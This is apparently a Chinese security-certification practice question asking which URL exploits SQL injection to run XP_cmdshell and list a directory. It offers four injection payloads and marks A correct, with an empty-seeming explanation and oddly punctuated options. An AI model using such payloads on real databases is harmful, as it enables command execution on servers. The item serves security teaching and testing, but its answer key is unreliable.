以下哪条命令能利用“SQL注入”漏洞动用XP_cmdshell存储过程,获得某个子目的清单?()
- A、http://localhost/script?’:EXEC+master..XP_cmdshell+’dir’:--
- B、http://localhost/script?1’:EXEC+master..XP_cmdshell+’dir’:--
- C、http://localhost/script?0’:EXEC+master..XP_cmdshell+’dir’:--
- D、http://localhost/script?1’:EXEC+master..XP_cmdshell+’dir’--
正确答案:A
答案解析:有
微信扫一扫手机做题